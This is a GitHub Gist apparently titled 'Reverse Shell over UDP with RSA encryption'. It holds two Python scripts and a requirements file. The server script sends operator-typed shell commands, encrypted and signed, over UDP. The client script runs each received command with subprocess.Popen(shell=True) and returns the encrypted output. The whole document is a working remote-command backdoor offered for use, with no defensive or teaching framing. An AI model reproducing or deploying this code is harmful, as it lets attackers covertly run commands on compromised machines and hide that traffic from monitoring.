Created
February 1, 2024 16:23
-
-
Save 0x07CB/616279732a5757c1c69251275ab616d7 to your computer and use it in GitHub Desktop.
Reverse Shell over UDP with RSA encryption
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
pyasn1==0.5.1 | |
rsa==4.9 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#coding: utf-8 | |
import rsa | |
import socket | |
class UDP_Server: | |
def __init__(self, host, port): | |
self.host = host | |
self.port = port | |
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
def close(self): | |
self.sock.close() | |
return self | |
def send_data(self, data, address): | |
self.sock.sendto(data, address) | |
return self | |
def recv_data(self, size): | |
return self.sock.recvfrom(size) | |
def bind(self): | |
self.sock.bind((self.host, self.port)) | |
return self | |
class RSA_Communication: | |
def __init__(self, key_size=4096): | |
self.pubkey, self.privkey = rsa.newkeys(key_size) | |
def get_pubkey_PEM(self): | |
return self.pubkey.save_pkcs1('PEM') | |
def get_privkey_PEM(self): | |
return self.privkey.save_pkcs1('PEM') | |
def load_pubkey_PEM(self, keydata): | |
self.pubkey = rsa.PublicKey.load_pkcs1(keydata) | |
return self | |
def load_privkey_PEM(self, keydata): | |
self.privkey = rsa.PrivateKey.load_pkcs1(keydata) | |
return self | |
def encrypt(self, data): | |
if ( type(data) != bytes ): | |
data = data.encode('utf-8') | |
return rsa.encrypt(data, self.pubkey) | |
def decrypt(self, data): | |
if ( type(data) != bytes ): | |
data = data.encode('utf-8') | |
return rsa.decrypt(data, self.privkey) | |
class RSA_Signature: | |
def __init__(self, hash_method='SHA-1', key_size=4096): | |
self.hash_method = hash_method | |
self.key_size = key_size | |
def sign(self, data, privkey): | |
if ( type(data) != bytes ): | |
data = data.encode('utf-8') | |
return rsa.sign(data, rsa.PrivateKey.load_pkcs1(privkey), self.hash_method) | |
def verify(self, data, signature, pubkey): | |
if ( type(data) != bytes ): | |
data = data.encode('utf-8') | |
return rsa.verify(data, signature, rsa.PublicKey.load_pkcs1(pubkey)) | |
def check_signature(self, data, signature, pubkey): | |
if ( type(data) != bytes ): | |
data = data.encode('utf-8') | |
try: | |
check_hash_algo = self.verify(data, signature, pubkey) | |
if ( check_hash_algo == self.hash_method ): | |
return True | |
else: | |
return False | |
except rsa.pkcs1.VerificationError: | |
return False | |
def main(): | |
server = UDP_Server("127.0.0.1", 12345) | |
server.bind() | |
rsa_comm = RSA_Communication() | |
pubkey = rsa_comm.get_pubkey_PEM() | |
client_pubkey = None | |
client_address = None | |
print("Serveur en attente de connexion...") | |
client_pubkey, client_address = server.recv_data(1024) | |
print("Tentative de connexion entrante de: ", client_address) | |
print("Clé publique du client reçue.") | |
if ( type(client_pubkey) != bytes ): | |
client_pubkey = client_pubkey.encode('utf-8') | |
print("Connexion établie avec le client: ", client_address) | |
server.send_data(pubkey, client_address) | |
while True: | |
auth_sign = RSA_Signature('SHA-1',4096) | |
shell_command = input("shell>> ") | |
if 'terminate' in shell_command: | |
terminate = True | |
else: | |
terminate = False | |
if type(shell_command) != bytes: | |
shell_command = shell_command.encode('utf-8') | |
shell_command_signature = auth_sign.sign(shell_command,rsa_comm.get_privkey_PEM()) | |
server.send_data(rsa.encrypt(shell_command, rsa.PublicKey.load_pkcs1(client_pubkey)), client_address) | |
server.send_data(shell_command_signature, client_address) | |
if terminate: | |
server.close() | |
break | |
crypt_shell_stdout, address = server.recv_data(1024) | |
signature_shell_stdout, address = server.recv_data(1024) | |
crypt_shell_stderr, address = server.recv_data(1024) | |
signature_shell_stderr, address_ = server.recv_data(1024) | |
shell_stdout = rsa_comm.decrypt(crypt_shell_stdout) | |
shell_stderr = rsa_comm.decrypt(crypt_shell_stderr) | |
if (address_ == address): | |
if ( auth_sign.check_signature(shell_stdout, signature_shell_stdout, client_pubkey) == True ) and ( auth_sign.check_signature(shell_stderr, signature_shell_stderr, client_pubkey) == True ): | |
print(shell_stdout.decode()) | |
print(shell_stderr.decode()) | |
if __name__ == "__main__": | |
main() | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#coding: utf-8 | |
import rsa | |
import socket | |
import subprocess | |
class UDP_Client: | |
def __init__(self, host, port): | |
self.host = host | |
self.port = port | |
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
def close(self): | |
self.sock.close() | |
return self | |
def send_data(self, data, address): | |
self.sock.sendto(data, address) | |
return self | |
def recv_data(self, size): | |
return self.sock.recvfrom(size) | |
class RSA_Communication: | |
def __init__(self, key_size=4096): | |
self.pubkey, self.privkey = rsa.newkeys(key_size) | |
def get_pubkey_PEM(self): | |
return self.pubkey.save_pkcs1('PEM') | |
def get_privkey_PEM(self): | |
return self.privkey.save_pkcs1('PEM') | |
def load_pubkey_PEM(self, keydata): | |
self.pubkey = rsa.PublicKey.load_pkcs1(keydata) | |
return self | |
def load_privkey_PEM(self, keydata): | |
self.privkey = rsa.PrivateKey.load_pkcs1(keydata) | |
return self | |
def encrypt(self, data): | |
if ( type(data) != bytes ): | |
data = data.encode('utf-8') | |
return rsa.encrypt(data, self.pubkey) | |
def decrypt(self, data): | |
if ( type(data) != bytes ): | |
data = data.encode('utf-8') | |
return rsa.decrypt(data, self.privkey) | |
class RSA_Signature: | |
def __init__(self, hash_method='SHA-1', key_size=4096): | |
self.hash_method = hash_method | |
self.key_size = key_size | |
def sign(self, data, privkey): | |
if ( type(data) != bytes ): | |
data = data.encode('utf-8') | |
return rsa.sign(data, rsa.PrivateKey.load_pkcs1(privkey), self.hash_method) | |
def verify(self, data, signature, pubkey): | |
if ( type(data) != bytes ): | |
data = data.encode('utf-8') | |
return rsa.verify(data, signature, rsa.PublicKey.load_pkcs1(pubkey)) | |
def check_signature(self, data, signature, pubkey): | |
if ( type(data) != bytes ): | |
data = data.encode('utf-8') | |
try: | |
check_hash_algo = self.verify(data, signature, pubkey) | |
if ( check_hash_algo == self.hash_method ): | |
return True | |
else: | |
return False | |
except rsa.pkcs1.VerificationError: | |
return False | |
def main(): | |
rsa_comm = RSA_Communication() | |
pubkey = rsa_comm.get_pubkey_PEM() | |
client = UDP_Client("127.0.0.1", 12345) | |
client.send_data(pubkey, ("127.0.0.1", 12345)) | |
server_pubkey, server_address = client.recv_data(1024) | |
while True: | |
auth_sign = RSA_Signature('SHA-1',4096) | |
encrypted_command, server_address = client.recv_data(1024) | |
command = rsa_comm.decrypt(encrypted_command).decode('utf-8') | |
signature_command, server_address_ = client.recv_data(1024) | |
if (server_address_ == server_address): | |
if ( auth_sign.check_signature(command, signature_command, server_pubkey) == True ): | |
if 'terminate' in command: | |
client.close() | |
break | |
else: | |
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) | |
clear_stdout, clear_stderr = CMD.stdout.read(), CMD.stderr.read() | |
encrypted_stdout = rsa.encrypt(clear_stdout, rsa.PublicKey.load_pkcs1(server_pubkey,'PEM')) | |
encrypted_stderr = rsa.encrypt(clear_stderr, rsa.PublicKey.load_pkcs1(server_pubkey,'PEM')) | |
signature_message = auth_sign.sign(clear_stdout,rsa_comm.get_privkey_PEM()) | |
client.send_data(encrypted_stdout, server_address) | |
client.send_data(signature_message, server_address) | |
signature_message = auth_sign.sign(clear_stderr,rsa_comm.get_privkey_PEM()) | |
client.send_data(encrypted_stderr, server_address) | |
client.send_data(signature_message, server_address) | |
if __name__ == "__main__": | |
main() | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment